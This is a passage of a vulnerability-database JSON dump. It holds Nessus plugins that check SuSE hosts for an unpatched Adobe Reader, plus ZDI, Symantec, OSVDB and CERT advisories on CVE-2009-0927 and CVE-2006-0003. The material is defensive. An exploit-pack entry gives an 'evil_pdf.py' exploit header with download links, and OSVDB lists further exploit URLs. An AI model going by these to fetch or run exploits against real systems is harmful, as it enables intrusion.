CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : acroread (acroread-689)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_11_0_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/39906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39906);\n 
script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-689)\");\n script_summary(english:\"Check for the acroread-689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-8.1.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:54", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "edition": 24, "published": "2009-03-27T00:00:00", "title": "openSUSE 10 Security Update : acroread (acroread-6120)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-03-27T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_ACROREAD-6120.NASL", "href": "https://www.tenable.com/plugins/nessus/36033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-6120.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36033);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE 10 Security Update : acroread (acroread-6120)\");\n script_summary(english:\"Check for the acroread-6120 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash 
acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"acroread-8.1.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:41", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread"], "id": "SUSE_11_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/41362", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41362);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0193.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0927.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0928.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2009-1061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1062.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 690.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-8.1.4-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe AcrobatReader 7.1.18.1.39.1 - Collab getIcon Universal", "edition": 1, "published": "2009-09-03T00:00:00", "title": "Adobe AcrobatReader 7.1.18.1.39.1 - Collab getIcon Universal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-09-03T00:00:00", "id": "EXPLOITPACK:A99632279EAE4DA17D8EAF0E27E2511B", "href": "", "sourceData": "#!/usr/bin/env python\n#\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\n# evil_pdf.py, tested on Operating Systems:\n# Windows XP SP3 English/French\n# Windows 2003 SP2 English\n# with Application versions:\n# Adobe Reader 9.0.0/8.1.2 English/French\n# Test methods:\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). 
All rights reserved.\n# [Coromputer] raised from the ashes.\n#\n\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip)\n\n# milw0rm.com [2009-09-03]", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:04", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file. The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.", "modified": "2009-06-22T00:00:00", "published": "2009-03-24T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-014/", "id": "ZDI-09-014", "title": "Adobe Acrobat getIcon() Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-13T12:07:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-0927"], "description": "### Description\n\nAdobe Acrobat and Reader are prone to a remote code-execution vulnerability because the software fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users. 
The issue affects the following: Reader and Acrobat 7.1 and prior Reader and Acrobat 8.1.2 and prior Reader and Acrobat 9 UPDATE (March 24, 2009): This BID was previously titled 'Adobe Acrobat and Reader Unspecified JavaScript Method Remote Code Execution Vulnerability', but has been updated to better document the issue.\n\n### Technologies Affected\n\n * Adobe Acrobat Professional 7.0.0 \n * Adobe Acrobat Professional 7.0.1 \n * Adobe Acrobat Professional 7.0.2 \n * Adobe Acrobat Professional 7.0.3 \n * Adobe Acrobat Professional 7.0.4 \n * Adobe Acrobat Professional 7.0.5 \n * Adobe Acrobat Professional 7.0.6 \n * Adobe Acrobat Professional 7.0.7 \n * Adobe Acrobat Professional 7.0.8 \n * Adobe Acrobat Professional 7.0.9 \n * Adobe Acrobat Professional 7.1 \n * Adobe Acrobat Professional 8.0 \n * Adobe Acrobat Professional 8.1 \n * Adobe Acrobat Professional 8.1.1 \n * Adobe Acrobat Professional 8.1.2 \n * Adobe Acrobat Professional 8.1.2 Security Update 1 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Standard 7.0.0 \n * Adobe Acrobat Standard 7.0.1 \n * Adobe Acrobat Standard 7.0.2 \n * Adobe Acrobat Standard 7.0.3 \n * Adobe Acrobat Standard 7.0.4 \n * Adobe Acrobat Standard 7.0.5 \n * Adobe Acrobat Standard 7.0.6 \n * Adobe Acrobat Standard 7.0.7 \n * Adobe Acrobat Standard 7.0.8 \n * Adobe Acrobat Standard 7.1 \n * Adobe Acrobat Standard 8.0 \n * Adobe Acrobat Standard 8.1 \n * Adobe Acrobat Standard 8.1.1 \n * Adobe Acrobat Standard 8.1.2 \n * Adobe Acrobat Standard 9 \n * Adobe Reader 7.0.0 \n * Adobe Reader 7.0.1 \n * Adobe Reader 7.0.2 \n * Adobe Reader 7.0.3 \n * Adobe Reader 7.0.4 \n * Adobe Reader 7.0.5 \n * Adobe Reader 7.0.6 \n * Adobe Reader 7.0.7 \n * Adobe Reader 7.0.8 \n * Adobe Reader 7.0.9 \n * Adobe Reader 7.1 \n * Adobe Reader 8.0 \n * Adobe Reader 8.1 \n * Adobe Reader 8.1.1 \n * Adobe Reader 8.1.2 \n * Adobe Reader 8.1.2 Security Update 1 \n * Adobe Reader 9 \n * Gentoo Linux \n * Nortel Networks Self-Service - CCSS7 \n * Nortel 
Networks Self-Service MPS 1000 \n * Nortel Networks Self-Service Peri Application \n * Nortel Networks Self-Service Peri Workstation \n * SuSE Linux Desktop 10 \n * SuSE Novell Linux Desktop 9.0.0 \n * SuSE Suse Linux Enterprise Desktop 10 SP2 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE openSUSE 10.3 \n * SuSE openSUSE 11.0 \n * SuSE openSUSE 11.1 \n * Sun Solaris 10 Sparc \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. 
Please see the references for details.\n", "modified": "2009-03-18T00:00:00", "published": "2009-03-18T00:00:00", "id": "SMNTC-34169", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/34169", "type": "symantec", "title": "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-0003"], "edition": 1, "description": "## Vulnerability Description\nMicrosoft RDS.Dataspace ActiveX control, which is distributed with Microsoft Data Access Components, contains a flaw that may allow an attacker to execute code in the context of the user visiting a malicious web page. No further details have been provided.\n## Solution Description\nMicrosoft has released a patch to address this issue. Additionally, it is possible to correct the flaw by implementing the following workaround(s): \ndisable execution of activeX controls in Internet Explorer\n## Short Description\nMicrosoft RDS.Dataspace ActiveX control, which is distributed with Microsoft Data Access Components, contains a flaw that may allow an attacker to execute code in the context of the user visiting a malicious web page. 
No further details have been provided.\n## References:\n[Vendor Specific Advisory URL](http://www.hitachi-support.com/security_e/vuls_e/HS06-013_e/index-e.html)\nSecurity Tracker: 1015894\n[Secunia Advisory ID:19583](https://secuniaresearch.flexerasoftware.com/advisories/19583/)\n[Secunia Advisory ID:20719](https://secuniaresearch.flexerasoftware.com/advisories/20719/)\nMicrosoft Security Bulletin: MS06-014\nMicrosoft Knowledge Base Article: 911562\nKeyword: MDAC\nGeneric Exploit URL: http://milw0rm.com/exploits/2052\nGeneric Exploit URL: http://www.securityfocus.com/data/vulnerabilities/exploits/bl4ck_ms06_014.py\nGeneric Exploit URL: http://metasploit.com/projects/Framework/exploits.html#ie_createobject\n[CVE-2006-0003](https://vulners.com/cve/CVE-2006-0003)\nBugtraq ID: 17462\n", "modified": "2006-04-11T15:32:38", "published": "2006-04-11T15:32:38", "href": "https://vulners.com/osvdb/OSVDB:24517", "id": "OSVDB:24517", "type": "osvdb", "title": "Microsoft Data Access Components RDS.Dataspace ActiveX Remote Code Execution", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:43:06", "bulletinFamily": "info", "cvelist": ["CVE-2006-0003"], "description": "### Overview \n\nThe Microsoft RDS.Dataspace ActiveX control bypasses the ActiveX security model, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. \n\n### Description \n\n**ActiveX** \n\n\n[ActiveX](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Internet Explorer is a common Windows application that makes use of ActiveX controls. 
\n** \nActiveX safety determination** \n \nInternet Explorer determines if an ActiveX control is safe by querying the [IObjectSafety interface](<http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp>) of the object and by querying the Implemented Categories registry key for the control, as specified by [Microsoft Knowledge Base Article 216434](<http://support.microsoft.com/kb/216434/>) and the [MSDN ActiveX safety article](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>). \n** \nActiveX security options** \n \nThrough either the IObjectSafety interface or the appropriate registry values, an ActiveX control can be marked as \"safe for scripting\" and/or \"safe for initialization.\" According to the MSDN article [Signing and Marking ActiveX Controls](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp>):\n\n_If you mark your control as safe for initializing, you are asserting that no matter what values are used to initialize your control, it won't do anything that would damage a user's system or compromise the user's security._ \n_ \nIf you mark your control as safe for scripting, you are asserting that your control won't do anything to damage a user's system or compromise the user's security, regardless of how your control's methods and properties are manipulated by the Web page's script. In other words, it has to accept any method calls (with any parameters) and/or property manipulations in any order without doing anything bad._ \n**Microsoft Data Access Components and Remote Data Service (RDS)** \n \nMDAC is a collection of utilities and routines to process requests between databases and network applications. The RDS component provides an intermediary step for a client's request for service from a back-end database. The component enables the web site to apply business logic to the request. 
\n \n**The Problem** \n \nThe RDS.Dataspace ActiveX control includes a method that can create an instance of an ActiveX control that exists on the system. The ActiveX objects created in this manner will bypass the ActiveX security model. In particular, the \"safe for scripting\" and killbit options are ignored. Note that in default configurations of Internet Explorer, the RDS.Dataspace ActiveX control cannot be loaded in the Internet Zone. \n \nNote that exploit code for this vulnerability is publicly available. \n \nMore information is available in Microsoft Security Bulletin [MS06-014](<http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>). \n \n--- \n \n### Impact \n\nIf a remote attacker can persuade a user to access a specially crafted web page, that attacker may be able to execute arbitrary code with the privileges of the compromised user. \n \n--- \n \n### Solution \n\n**Apply an Update** \nThis issue is addressed in Microsoft Security Bulletin [MS06-014](<http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>). \n \n--- \n \n \n**Disable the**** ****RDS.Dataspace ActiveX control**** ****in Internet Explorer** \n \nThe RDS.Dataspace ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n{BD96C556-65A3-11D0-983A-00C04FC29E36} \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). \n** \nDisable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. 
Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser\"](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) document and the [Malicious Web Scripts FAQ](<http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>). \n \n--- \n \n### Vendor Information\n\n234812\n\n### Microsoft Corporation Affected\n\nUpdated: April 11, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234812 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>\n * <http://secunia.com/advisories/19583/>\n * <http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp>\n\n### Acknowledgements\n\nThis vulnerability was reported in Microsoft Security Bulletin MS06-014. 
